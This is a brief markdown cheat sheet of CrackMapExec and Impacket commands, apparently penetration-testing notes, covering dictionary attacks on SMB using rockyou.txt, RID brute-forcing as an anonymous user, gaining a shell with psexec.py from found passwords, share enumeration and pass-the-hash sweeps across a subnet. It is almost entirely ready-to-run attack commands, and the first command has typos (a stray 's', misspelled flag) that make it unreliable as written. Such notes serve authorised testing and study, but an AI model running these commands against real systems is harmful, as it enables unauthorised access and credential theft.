# Crackmapexec

## Dictionary attack against SMB

```sh
cme <smb/mssql> <domain/IP> -u <user> s -p /usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt --continue-on-sucess --no-brute
```

## Brute Force attack against SMB

Brute force attack using an anonymous user

```sh
cme smb <TARGET_IP> -u anonymous -p "" --rid-brute 10000
```

## Use Found Password

Use the password with `impacket/examples/psexec.py` in the following way

```sh
psexec.py domain.name/<user>:<password>@<target-IP>
```

## Enumerate Shares

Check user permissions on shares

```sh
crackmapexec  smb 10.200.x.0/24 -u <user> -p <password> --shares
```

## SMB

Check user hash on the network via smb

```sh
 crackmapexec smb 10.200.x.0/24 -u <user> -d <domain> -H <hash>
```